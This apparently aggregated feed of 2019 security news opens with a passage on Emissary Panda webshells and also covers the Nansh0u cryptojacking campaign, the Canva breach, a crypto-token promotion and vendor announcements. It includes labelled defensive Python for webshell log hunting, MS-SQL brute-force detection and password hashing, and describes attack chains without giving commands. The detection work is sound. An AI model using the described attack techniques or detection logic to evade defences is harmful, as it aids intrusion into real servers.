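Two checks a defender can run against a SharePoint farm after reading this, written here as an added example and not taken from the Palo Alto Networks report or from this post. The first hashes a suspect file against the error2.aspx SHA256 quoted above. The second reads IIS W3C logs and pulls out POST requests to .aspx pages outside a baseline of pages that legitimately receive POSTs: webshell interaction runs over the site’s own HTTPS and leaves no useful network signature, but every command still lands as a request in the web server log. The baseline set and the log lines are constructed for the example; a real baseline comes from the farm’s own logs before the hunt.

```python
"""Webshell hunting on an IIS/SharePoint host (added example, not vendor code).

1. Hash a file against the error2.aspx IOC quoted in the report.
2. Find POSTs to .aspx pages that are not in a baseline of pages that
   legitimately receive POSTs. Baseline and log lines are constructed here.
"""
import hashlib
from collections import Counter

# IOC from the Palo Alto Networks report quoted above (Antak-variant webshell)
ERROR2_ASPX_SHA256 = "006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38"

# Assumption: pages under the SharePoint layouts tree that receive POSTs in normal
# use on this farm. Build it from weeks of the farm's own logs, do not guess it.
BASELINE_POST_TARGETS = {
    "/_layouts/15/upload.aspx",
    "/_layouts/15/authenticate.aspx",
}

# Constructed IIS W3C sample (IIS writes spaces inside a field as '+').
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2019-04-01 08:12:01 10.0.0.5 GET /sites/hr/SitePages/Home.aspx - 443 CORP\alice 10.0.0.41 Mozilla/5.0+(Windows+NT+10.0) https://intranet.example/sites/hr 200 0 0 120
2019-04-01 08:12:09 10.0.0.5 POST /_layouts/15/upload.aspx - 443 CORP\alice 10.0.0.41 Mozilla/5.0+(Windows+NT+10.0) https://intranet.example/sites/hr 200 0 0 210
2019-04-01 08:20:33 10.0.0.5 GET /_layouts/15/error2.aspx - 443 - 198.51.100.23 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 35
2019-04-01 08:20:35 10.0.0.5 POST /_layouts/15/error2.aspx - 443 - 198.51.100.23 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 41
2019-04-01 08:21:02 10.0.0.5 POST /_layouts/15/error2.aspx - 443 - 198.51.100.23 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 388
2019-04-01 08:25:47 10.0.0.5 POST /_layouts/15/error2.aspx - 443 - 198.51.100.23 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 1294
"""


def parse_iis_w3c(text):
    """Yield one dict per request, naming columns from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):     # skip truncated or rotated-in-place lines
                yield dict(zip(fields, values))


def find_webshell_candidates(log_text, baseline):
    """Count POSTs per (client IP, page) to .aspx pages that are outside the baseline."""
    hits = Counter()
    for req in parse_iis_w3c(log_text):
        path = req["cs-uri-stem"].lower()
        if req["cs-method"] != "POST" or not path.endswith(".aspx"):
            continue
        if path in baseline:
            continue
        hits[(req["c-ip"], path)] += 1
    return hits


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def matches_error2_ioc(data):
    """True only if the bytes are the exact error2.aspx sample from the report."""
    return sha256_hex(data) == ERROR2_ASPX_SHA256


if __name__ == "__main__":
    for (ip, page), count in find_webshell_candidates(SAMPLE_LOG, BASELINE_POST_TARGETS).items():
        print(f"{count} POST(s) from {ip} to {page} (not in baseline)")
    print("sample page matches IOC:", matches_error2_ioc(b'<%@ Page Language="C#" %>'))
```

Hits from an unauthenticated client with no referer against a page that had never received a POST before are the ones to open first; the request and response sizes of real webshell traffic are small and irregular, unlike form submissions. The hash check only catches the exact sample: a single changed byte in the webshell defeats it, which is why the log-based hunt and a file inventory of the layouts directory matter more than the IOC.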

Pierluigi Paganini

(SecurityAffairs – cyberespionage, Emissary Panda)

The post Emissary Panda APT group hit Government Organizations in the Middle East appeared first on Security Affairs.

CLB Super Holder Event


For all CLB holders and super fans, we are proud to announce that we will be holding a special CLB token snapshot event!

CLB holders that purchase and hold a minimum of 100,000 CLB tokens in a designated wallet will automatically be eligible to receive free CLB and CLBK (upcoming KLAY compatible CLB token launch) token bonuses based on the market price of CLB at the time of the snapshot.

The event snapshot will officially end on June 17th, 2019 at 4pm Korean Standard Time.

What is CLBK?

As an official Initial Service Partner (ISP), Cloudbric will be distributing new CLBK tokens that will be used interchangeably with Klaytn’s upcoming KLAY token, as well as the Klaytn blockchain.


Event Details

Starting today, users that hold a minimum of 100,000 CLB tokens by the end of the snapshot period will be able to receive free CLB and CLBK bonus distributions to their accounts.

All eligible CLB holders will receive a guaranteed minimum of 5% cumulative bonus distributions (CLB and CLBK tokens) of their total CLB stake as long as they hold the minimum CLB token amount.

All users will also have a chance to earn even higher bonus distribution tiers based on the final market price of CLB at the time of the snapshot.

  • End Date: June 17th, 2019 at 4pm Korean Standard Time
  • Distribution: CLB bonuses will be distributed within 7 business days of the event snapshot (please note that CLBK tokens will be distributed AFTER the Klaytn mainnet launch)
  • Requirements: Participating users must have a minimum of 100,000 CLB tokens at the time of the snapshot
  • How to apply: Complete and submit the application form below with your email address and wallet address information (must NOT be an exchange wallet address)


CLB/CLBK Rewards Distribution

All eligible users will be able to receive a 5% cumulative bonus distribution of their total CLB stake.

However, higher bonus tiers are available based on the final market price of CLB at the time of the snapshot.

Please note that CLB market price and subsequent bonus distribution tiers will be based on the Korean Won price of CLB listed on Bitsonic Exchange.


For more information on Bitsonic Exchange, please visit their website at:


Refer to the table below to see the various bonus distribution tiers.

Snapshot Price        Total Bonus   CLB Bonus   CLBK Bonus
Under 15 won          5%            2.5%        2.5%
15 - 19 won           7%            3.5%        3.5%
20 - 29 won           10%           5%          5%
30 - 49 won           15%           7.5%        7.5%
Higher than 50 won    30%           15%         15%
  • CLB and CLBK token distribution amounts will be the same
  • CLBK tokens will be eligible for distribution AFTER the Klaytn mainnet launch


Important Disclaimer

  • Multiple applications are allowed as long as each individual wallet account meets the minimum CLB token requirements per account (cannot submit multiple accounts that are under 100,000 CLB)
  • To prevent any issues of email or wallet addresses being inputted incorrectly, take and hold a screen capture of your information as shown below until the end of the event.
  • Each user must submit a separate personal wallet address for their event application. We will NOT accept exchange wallet addresses
  • If it is determined that a transaction or wallet information is invalid, unfair, or stolen, then distribution to these accounts will NOT be made
  • Cloudbric retains all rights and responsibilities for the event



☆★Preview Event: CLBK Airdrop Event☆★

On June 27th, 2019, Kakao’s long awaited Klaytn mainnet will officially launch!

In celebration of the launch, Cloudbric will be running a special CLBK token airdrop event.

Please stay tuned for more information and announcements regarding our airdrop event coming soon.

The post CLB Super Holder Event appeared first on Cloudbric.

Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers

Guardicore Labs uncovered a widespread cryptojacking campaign tracked as Nansh0u and aimed at Windows MS-SQL and PHPMyAdmin servers.

Security experts at Guardicore Labs uncovered a widespread cryptojacking campaign that delivers malware dubbed Nansh0u to Windows MS-SQL and PHPMyAdmin servers worldwide.

According to the experts, the campaign is being carried out by China-based attackers.

Nansh0u has already infected around 50,000 servers worldwide. The attackers also deploy a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated.

“During the past two months, the Guardicore Labs team has been closely following a China-based campaign which aimed to infect Windows MS-SQL and PHPMyAdmin servers worldwide.” reads the report published by Guardicore.

“Breached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors. Once compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.”

The attacks date back to February 26, and experts observed over seven hundred new victims per day. Researchers identified 20 versions of the malicious payload, with new payloads created at least once a week and put to use in the campaign immediately after they were built.


The threat actors launch brute-force attacks against Windows MS-SQL and PHPMyAdmin servers that they have previously identified as exposed online.

Once logged in with administrative privileges, they execute a sequence of MS-SQL commands that download a malicious payload from a remote file server and run it with SYSTEM privileges.
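The brute-force stage of this chain leaves a characteristic trail in the SQL Server ERRORLOG: a run of error 18456 “Login failed for user” lines from one client address, and, if the instance audits successful logins too, a “Login succeeded” line from the same address once a password hits. The following is an added example, not code from the Guardicore report or from its PowerShell checker; the log excerpt is constructed, and the threshold and window values are arbitrary assumptions a defender would tune. It flags client IPs with repeated failures inside a sliding window and escalates when a flagged IP then authenticates, which is the point at which a Nansh0u-style intrusion would move on to running MS-SQL commands.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed SQL Server ERRORLOG excerpt (not from the Guardicore report).  Error 18456
# lines record failed logins; the "Login succeeded" line only appears when the instance
# is configured to audit successful logins as well as failures.
SAMPLE_LOG = """\
2019-05-29 10:00:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2019-05-29 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2019-05-29 10:00:02.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2019-05-29 10:00:03.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2019-05-29 10:00:04.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2019-05-29 10:00:05.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2019-05-29 10:00:06.95 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2019-05-29 10:00:09.50 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.7]
2019-05-29 10:05:00.00 Logon       Login failed for user 'app_ro'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.12]
"""

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)


def parse_logon_events(text):
    """Return (timestamp, client_ip, login_name, succeeded) for every logon line."""
    events = []
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if not m:
            continue  # the "Error: 18456, Severity..." header line carries no client/user detail
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
        events.append((ts, m.group("ip"), m.group("user"), m.group("result") == "succeeded"))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Flag client IPs with at least `threshold` failed logins inside a sliding window.

    Returns {ip: {"failures": total, "users": set, "succeeded_as": set,
                  "success_after_failures": bool}}.  A success from an IP that was
    already brute-forcing is the signal that the intrusion may have moved on to the
    post-login stage and the host needs a closer look.
    """
    recent = defaultdict(deque)    # ip -> timestamps of failures still inside the window
    failures = defaultdict(int)
    targeted = defaultdict(set)
    flagged = {}
    for ts, ip, user, ok in sorted(events):
        if ok:
            if ip in flagged:
                flagged[ip]["success_after_failures"] = True
                flagged[ip]["succeeded_as"].add(user)
            continue
        failures[ip] += 1
        targeted[ip].add(user)
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = {"success_after_failures": False, "succeeded_as": set()}
    for ip, finding in flagged.items():
        finding["failures"] = failures[ip]
        finding["users"] = set(targeted[ip])
    return flagged


if __name__ == "__main__":
    for ip, finding in detect_bruteforce(parse_logon_events(SAMPLE_LOG)).items():
        print(ip, finding)
```

Running the block prints one finding for 203.0.113.7: six failures against `sa` followed by a success, while the single failure from 10.0.0.12 stays below the threshold. Without successful-login auditing the escalation flag can never be set, so that audit setting is worth checking before relying on this logic.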

Attackers used two exploits tracked as apexp.exe and apexp2012.exe that trigger the privilege escalation vulnerability CVE-2014-4113. The exploits allow running any executable with SYSTEM privileges.

“Using this Windows privilege, the attacking exploit injects code into the winlogon process. The injected code creates a new process which inherits winlogon’s SYSTEM privileges, providing equivalent permissions as the prior version.” continues the analysis.

The payloads used in this campaign were droppers used to deliver a cryptocurrency miner to mine TurtleCoin cryptocurrency.

Many of the payloads dropped a kernel-mode driver under a random file name into AppData/Local/Temp. The compile time of these drivers suggests they were built in 2016, yet most AV engines still do not detect them as malicious.

The driver carried a digital signature issued by the Certificate Authority Verisign.

“We can confidently say that this campaign has been operated by Chinese attackers,” concludes the report. “We base this hypothesis on the following observations:

  • The attacker chose to write their tools with EPL, a Chinese-based programming language.
  • Some of the file servers deployed for this campaign are HFSs in Chinese.
  • Many log files and binaries on the servers included Chinese strings, such as 结果-去重复 (“duplicates removed”) in logs containing breached machines, or 开始 (“start”) in the name of the script initiating port scans.”

Experts also published a list of IoCs (indicators of compromise) and a free PowerShell-based script that could be used by Windows admins to check whether their systems are infected or not.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – nansh0u malware, hacking)

The post Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers appeared first on Security Affairs.

A veteran’s look at the cybersecurity industry and the problems that need solving

For many in the infosec industry, Daniel Miessler needs no introduction, as he’s a 20-year industry veteran, a professional that fulfilled a variety of security roles at companies like HP and IOActive, a leader of the OWASP IoT Security Project and, most prominently, the author of the popular Unsupervised Learning podcast, newsletter and blog. Apart from effectively curating and summarizing content produced by others, Miessler is also the source of interesting ideas and occasionally unorthodox … More

The post A veteran’s look at the cybersecurity industry and the problems that need solving appeared first on Help Net Security.

Majority of CISOs plan to ask for an increase in cybersecurity investment

Most CISOs of financial institutions (73 percent) plan to ask their organization’s CFO for an increase in cybersecurity investments in the next year, according to the Financial Services Information Sharing and Analysis Center (FS-ISAC), an industry consortium dedicated to reducing cyber-risk in the global financial system. “The advancement and adoption of new technologies coupled with increased geopolitical tension has fueled a rapidly evolving cyber threat landscape,” said Steve Silberstein, CEO of FS-ISAC. “An effective cybersecurity … More

The post Majority of CISOs plan to ask for an increase in cybersecurity investment appeared first on Help Net Security.

Security overconfidence and immaturity continue to endanger organizations

The majority of organizations are ill-prepared to protect themselves against privileged access abuse, the leading cyber-attack vector, according to Centrify and Techvangelism. Seventy-nine percent of organizations do not have a mature approach to Privileged Access Management (PAM), yet 93% believe they are at least somewhat prepared against threats that involve privileged credentials. This overconfidence and immaturity are underscored by 52% of organizations surveyed stating they do not use a password vault, indicating that the majority … More

The post Security overconfidence and immaturity continue to endanger organizations appeared first on Help Net Security.

New initiative aims to strengthen IoT security, interoperability and reliability

The Zigbee Alliance publicly announced a major ongoing initiative to make smart home and IoT products easier to develop, deploy, and sell across ecosystems. The All Hubs Initiative is driven by a Zigbee Alliance workgroup comprised of leading IoT companies including Amazon, Comcast, Exegin, Kwikset, Landis+Gyr, LEEDARSON, Legrand, MMB Networks, NXP, OSRAM, Schneider Electric, Silicon Labs, Somfy, and many others with the goal of improving interoperability between IoT devices and major consumer and commercial platforms. … More

The post New initiative aims to strengthen IoT security, interoperability and reliability appeared first on Help Net Security.

Businesses are struggling to implement adequate IAM and PAM processes, practices and technologies

Businesses find identity and access management (IAM) and privileged access management (PAM) difficult, yet are not concerned about them. The results suggest that IAM- and PAM-related security tasks may be deprioritized or neglected, potentially exposing organizations to data breaches and other cyber risks. Conducted at RSA Conference in early March 2019, One Identity’s study polled 200 conference attendees on their biggest security challenges and concerns, as well as their workplace behaviors related to network and system access. … More

The post Businesses are struggling to implement adequate IAM and PAM processes, practices and technologies appeared first on Help Net Security.

Many are seeing the damage of cybercrime and identity theft firsthand

As massive data breaches continue to make international headlines and the Internet is an integral part of our daily lives, consumers are now grasping the risks they face. In a new F-Secure survey, 71% of respondents say they feel that they will become a victim of cybercrime or identity theft, while 73% expressed similar fears about their kids. “These findings are absolutely staggering and show many people are seeing the damage of cybercrime or identity … More

The post Many are seeing the damage of cybercrime and identity theft firsthand appeared first on Help Net Security.

Palo Alto Networks to acquire Twistlock and PureSec

Palo Alto Networks has entered into definitive agreements to acquire Twistlock, the leader in container security, and PureSec, a leader in serverless security, to extend its Prisma cloud security strategy. These proposed acquisitions will further advance the company’s ability to offer the most complete and comprehensive cloud security suite in all critical areas of cloud security. Prisma, used by approximately 9,000 customers worldwide, helps enable a secure journey to the cloud by providing organizations with … More

The post Palo Alto Networks to acquire Twistlock and PureSec appeared first on Help Net Security.

New Zealand Opposition Behind Budget Info Hack?

Two thousand unauthorized access attempts in 48 hours: that is how New Zealand’s Treasury Secretary, in coordination with the National Cyber Security Centre, described the budget information hacking incident that happened this week. New Zealand’s new public spending plan, dubbed the “well-being budget,” is due to be publicly disclosed in full on Thursday, May 30, 2019. But before that, the National Party, which serves as the opposition, released snippets of the budget ahead of the official release date.

“Following this morning’s media reports of a potential leak of Budget information, the Treasury has gathered sufficient evidence to indicate that its systems have been deliberately and systematically hacked. The Treasury takes the security of all the information it holds extremely seriously. It has taken immediate steps today to increase the security of all budget-related information and will be undertaking a full review of information security processes. There is no evidence that any personal information held by the Treasury has been subject to this hacking,” explained Gabriel Makhlouf, Treasury Secretary.

National Party’s leader, Simon Bridges denied insinuations that the opposition has something to do with the hacking incident, he also accused the administration party of performing an alleged witch-hunt to discredit them. “There has been no hacking under any definition of that word … there has been nothing illegal or even approaching that. We have acted legally, appropriately, without any hacking or anything approaching that by the National Party. Or indeed what Grant Robertson is saying, that’s how we’ve got it, he is wrong. They [the government] are not in control of what they are doing, so they are lashing out and they are having a witch-hunt.” emphasized Bridges.

The government of New Zealand, through its Treasury Department, has confirmed that the budget will still be released on the originally planned date despite the hacking incident. The National Party leadership placed the blame squarely on the incompetence of Treasury officials, in particular Makhlouf, for mishandling government data and for calling in the police as if cybercrime were a typical street crime. The opposition leader refused to explain how they were able to obtain a copy of the well-being budget.

“There’s this potential talk around cybersecurity and so on — I was a minister in charge of cybersecurity for Bill English and what I know is departments like the Treasury, with big organizations, there are attempts at hacking and so on, if not every day, very commonly. I don’t know what the situation with that is, but they wouldn’t have called in the police if that was what they were worried about,” concluded Bridges.

New Zealand’s well-being budget aims to change the government’s fiscal priorities, with a stronger focus on funding action against domestic abuse, a better mental health care system and protection against child labour practices driven by poverty. With social services taking the lion’s share of the budget, the government of New Zealand is putting less emphasis on economic growth than in previous years. The administration believes that domestic protection should receive more focus this year.

Also, Read:

Prolific Hacker SandboxEscaper Demos Windows 10 Zero-Day Exploit

Fundamentals Of Making A Hacker Out Of You

Criminals Hack Forum Used for Trading Stolen Credentials

Hackers Inject Scripts in WordPress Live Chat Plugin

Stack Overflow’s Production Systems Accessed by Hackers


The post New Zealand Opposition Behind Budget Info Hack? appeared first on .

Moogsoft AIOps 7.2 eases the burden of IT operations and DevOps teams

Moogsoft, a pioneer and leading provider of artificial intelligence for IT operations (AIOps), released Moogsoft AIOps 7.2, the latest version of its enterprise platform. Release 7.2 features groundbreaking new capabilities that ease the burden of IT Operations and DevOps teams by optimizing service assurance. Significant new transparency, efficiency, and customization enhancements include: a new workflow engine, AI visualizations, performance dashboards, and new tool integrations. “Operations teams seek ways to tame the complexity of their IT … More

The post Moogsoft AIOps 7.2 eases the burden of IT operations and DevOps teams appeared first on Help Net Security.

Journey to OSCP -10 Things You Need to Know

“OSCP is not about clearing the exam. It’s all about working deeply on labs.” –Ramkisan Mohan (Check out his detailed guide to OSCP Preparation) I began my OSCP journey in the late fall of 2018. So far, I’ve rooted 23+ machines in the PWK labs, and I am still plugging away, hoping to get as […]… Read More

The post Journey to OSCP -10 Things You Need to Know appeared first on The State of Security.

SailPoint Predictive Identity platform: The future of identity governance

SailPoint, the leader in enterprise identity governance, unveiled the SailPoint Predictive Identity platform, the intelligent cloud identity platform of the future that accelerates the industry to the next generation of identity governance. With SailPoint Predictive Identity, SailPoint is delivering a new world of adaptive security and continuous compliance that makes identity easy, transparent and autonomous. “The next phase of identity needs to anticipate user access needs, spot and respond to risky behavior, achieve continuous compliance … More

The post SailPoint Predictive Identity platform: The future of identity governance appeared first on Help Net Security.

ID Analytics and Alloy partner to fight fraud and mitigate risk

ID Analytics, a leader in consumer risk management, and Alloy, the platform helping the financial services industry make data-driven customer decisions, announced a partnership to help financial services companies more effectively mitigate risk and fight fraud. Alloy will use insights from the ID Analytics’ ID Network to provide its customers with additional insight to help them better authenticate consumers’ identities. The addition of data from ID Analytics’ ID Network will help Alloy customers mitigate risk … More

The post ID Analytics and Alloy partner to fight fraud and mitigate risk appeared first on Help Net Security.

Trend Micro works with security awareness vendors to offer free training content

Trend Micro announced partnerships with several leading cybersecurity training providers to help businesses protect their employees from the latest cyber threats. To ensure customers have a wide variety of training styles and formats, Trend Micro is teaming up with four leading partners: NINJIO, InfoSec, NextTech Security, and GoldPhish. The new training materials are available on Trend Micro’s Phish Insight tool, which is a free, highly flexible security awareness solution. This new educational platform will offer … More

The post Trend Micro works with security awareness vendors to offer free training content appeared first on Help Net Security.

Zyxel SD-WAN gets security, usability and speed boost

Zyxel Communications, a leading provider of secure broadband networking, Internet access and connected home products, announced several performance and feature enhancements to Zyxel SD-WAN. Zyxel SD-WAN allows SMBs to leverage the power of the cloud with a centrally-managed solution that increases performance, lowers costs and is more agile when compared to MPLS networks. Zyxel SD-WAN provides a reliable and secure WAN through an annual software license that runs on ZyWALL VPN50, VPN100 and VPN300 firewalls. … More

The post Zyxel SD-WAN gets security, usability and speed boost appeared first on Help Net Security.

Vology expands to deliver dark web monitoring services

Vology has expanded its cybersecurity solutions suite to now deliver Dark Web Monitoring Services. With this addition, Vology further enhances its comprehensive security approach by offering protection to organizations at risk due to exposed business usernames and passwords, then alerting them if their digital credentials are accessible to anonymous or untraceable users and website operators. By utilizing Vology’s comprehensive suite of cybersecurity solutions, businesses have access to industry-leading tools to protect their networks and sensitive … More

The post Vology expands to deliver dark web monitoring services appeared first on Help Net Security.

Ethernity Networks introduces its ENET Universal Edge Platform network appliance

Ethernity Networks, a leading innovator of comprehensive networking and security solutions on programmable hardware, introduced its ENET Universal Edge Platform (UEP) network appliance, an edge-optimized low-space, low-power FPGA-based programmable device with up to 40Gbps of networking capacity and 10Gbps of IPSec security performance. The UEP’s unique modularity enables the appliance to be easily adapted for multiple use cases, such as NID, DPU and MDU, and cell site router. With its embedded dual-core ARM processor that … More

The post Ethernity Networks introduces its ENET Universal Edge Platform network appliance appeared first on Help Net Security.

CyberData releases two secure access control endpoints for SMB market

CyberData Corporation continues its focus on Secure Access Control for the SMB market with two new releases: SIP Outdoor Intercom RFID Access Control Endpoint and SIP Outdoor Video Intercom RFID Keypad Access Control Endpoint. With these two new releases, VoIP VARs and Integrators who serve the SMB market can deliver a complete IP Access Control solution to customers using the customer’s new or existing IP PBX server, and without the usual monthly monitoring or set … More

The post CyberData releases two secure access control endpoints for SMB market appeared first on Help Net Security.

How McAfee’s Mentorship Program Helped Me Shine in My Career Journey

By: Anshu, Software Engineer

“The mind is not a vessel that needs filling, but wood that needs igniting.”—Mestrius Plutarchus

A mentor isn’t someone who answers your questions, but someone who helps you ask the right ones. After joining the McAfee WISE mentorship program as a mentee, I understood the essence of these words.

WISE is a community committed to providing opportunities for growth and success, increasing engagement, and empowering women at McAfee. Each year, WISE helps women network and find opportunities for their career development.

Joining the McAfee WISE Mentorship Program

The WISE Mentorship Program was introduced to address how women have been underrepresented in the tech sector, especially in cybersecurity. It’s believed that mentoring can address and improve job satisfaction and retention, which is how the program found its way to India and I learned about it. As an employee at McAfee for over five years, I had the opportunity to learn a lot of new things, but networking was a skillset I needed to hone. I thought this might be my chance to develop my skills, so I enrolled as a mentee.

I was partnered with “Chandramouli” also known as “Mouli” who happened to be the executive sponsor for the WISE India Chapter, as well as one of our IT leaders.

The Mentor-Mentee Relationship

My sessions with Mouli were informal conversations rather than formal sync-ups. We not only discussed the industry and women in tech—but also our personal stories, the books we read and are inspired by. We discovered a common love for badminton, so we started sharing analogies of how we would handle situations at work compared to game and life scenarios.

And the lessons learned were humbling. You win, you lose, you conquer. This thought shifted my perspective to think about how I would react if it was a badminton match. Would I accept defeat even if the opponent was on game point? Would I play differently even if I knew the match was lost? I realized I would fight and fiercely compete. This simple shift started to make me think on my toes daily.

Like many people, I had a fair idea of how I wanted my career to shape up, but with the help of a mentor, I began to steer faster toward my goal. In just one session, we were able to identify areas that were slowing down my development.

Developing My Skills

We noticed that networking was one of my key improvement areas, so we decided to tackle this with baby steps. He assigned small but achievable tasks to me—tasks as simple as creating a LinkedIn profile and connecting with former and current co-workers.

What happened after that was truly amazing. People from all walks of life in the industry, from my school, college, and more, started connecting with me, and it was then when I realized I had made an impression. Now I find it easier to initiate conversations, knowing that people are ready to help and talk about things we mutually love. As small as these strides might be, they helped me not just move ahead, but also provided me with measurable momentum.

Being able to discuss and question the status quo and engage with someone who is more experienced, knows the art of the game, and is a fierce champion for WISE is something I look forward to every month. Thanks to McAfee for giving each one of us this opportunity to help further our careers and to help us dream big.

Interested in joining our team? We’re hiring! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post How McAfee’s Mentorship Program Helped Me Shine in My Career Journey appeared first on McAfee Blogs.

AttackIQ announces $17.6 million in Series B funding

AttackIQ, the leader in the emerging market for continuous security validation, announced $17.6 million in Series B funding led by Khosla Ventures and existing investors including Index Ventures, Salesforce Ventures and Telstra Ventures. This brings AttackIQ’s total funding to approximately $35 million. The company will use the funds to continue development of its continuous security validation platform, increase hiring across all functional areas and further expand field operations. AttackIQ also announced that Brian Byun, partner … More

The post AttackIQ announces $17.6 million in Series B funding appeared first on Help Net Security.

Attention Graphic Designers: It’s Time to Secure Your Canva Credentials

Online graphic design tools are extremely useful when it comes to creating resumes, social media graphics, invitations, and other designs and documents. Unfortunately, these platforms aren’t immune to malicious online activity. Canva, a popular Australian web design service, was recently breached by a malicious hacker, exposing the records of 139 million users.

So, how was this breach discovered? The hacker, who goes by the name GnosticPlayers, contacted a security reporter from ZDNet on May 24th and made him aware of the situation. The hacker claims to have stolen data pertaining to 1 billion users from multiple websites. The compromised data from Canva includes names, usernames, email addresses, city, and country information.

Canva states that it stores all user passwords using bcrypt. Bcrypt is a deliberately slow password-hashing algorithm: hashing is one-way, so a password cannot be recovered from its hash, only guessed and re-hashed, and the slowness makes every guess expensive for an attacker. Each Canva password was also salted, meaning random data was mixed into the password before hashing so that two users with the same password do not end up with the same stored hash. According to ZDNet, the stolen data contained bcrypt-hashed passwords for 61 million users, and 78 million of the accounts were tied to Gmail addresses.
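To make the salt and work-factor points concrete, here is an added example; it is not Canva’s code, and nothing about Canva’s implementation beyond its use of bcrypt is public. It uses PBKDF2-HMAC-SHA256 from Python’s standard library as a stand-in for bcrypt (which needs a third-party package), so the algorithm name and the iteration counts are assumptions; the properties it shows, a fresh random salt per password, a tunable cost, verification by recomputing rather than decrypting, and a check for hashes whose cost has fallen behind policy, are the same ones that matter with bcrypt.

```python
import base64
import hashlib
import hmac
import os

# Stand-in for bcrypt: PBKDF2-HMAC-SHA256 from the standard library.  The iteration count
# plays the role of bcrypt's cost parameter: raising it makes each guess an attacker
# tries proportionally more expensive.  Values here are assumptions for the example.
ITERATIONS = 100_000
SALT_BYTES = 16
ALGO = "pbkdf2_sha256"


def hash_password(password, iterations=ITERATIONS):
    """Hash with a fresh random salt; returns a self-describing "algo$cost$salt$digest" string."""
    salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return "%s$%d$%s$%s" % (
        ALGO,
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute the hash with the stored salt and cost and compare in constant time.

    There is no decryption step: the only way to check a candidate is to hash it again,
    which is exactly what a cracker must do for every guess against every salted record."""
    try:
        algo, iterations, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != ALGO:
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, int(iterations), dklen=len(expected)
    )
    return hmac.compare_digest(digest, expected)


def needs_rehash(stored, min_iterations=ITERATIONS):
    """True when a stored hash was made with a lower cost than current policy demands.

    Call this after a successful login, while the plaintext is briefly available, to
    re-hash old records at the higher cost."""
    algo, iterations, _salt, _digest = stored.split("$")
    return algo != ALGO or int(iterations) < min_iterations


if __name__ == "__main__":
    first = hash_password("correct horse battery staple")
    second = hash_password("correct horse battery staple")
    print("same password, different records:", first != second)
    print("verify:", verify_password("correct horse battery staple", first))
```

The two records printed for the same password differ only in their salts, which is what stops an attacker from cracking one user’s hash and applying the result to every other user who chose the same password.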

Canva has notified users of the breach through email and ensured that their payment card and other financial data is safe. However, even if you aren’t a Canva user, it’s important to be aware of what cybersecurity precautions you should take in the event of a data breach. Check out the following tips:

  • Change your passwords. As an added precaution, Canva is encouraging their community of users to change their email and Canva account passwords. If a cybercriminal got a hold of the exposed data, they could gain access to your other accounts if your login credentials were the same across different platforms.
  • Check to see if you’ve been affected. If you’ve used Canva and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential data breaches.
  • Secure your personal data. Use a security solution like McAfee Identity Theft Protection. If your information is compromised during a breach, Identity Theft Protection helps monitor and keep tabs on your data in case a cybercriminal attempts to use it.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Attention Graphic Designers: It’s Time to Secure Your Canva Credentials appeared first on McAfee Blogs.

Axonius cybersecurity asset management app now available on Cortex by Palo Alto Networks

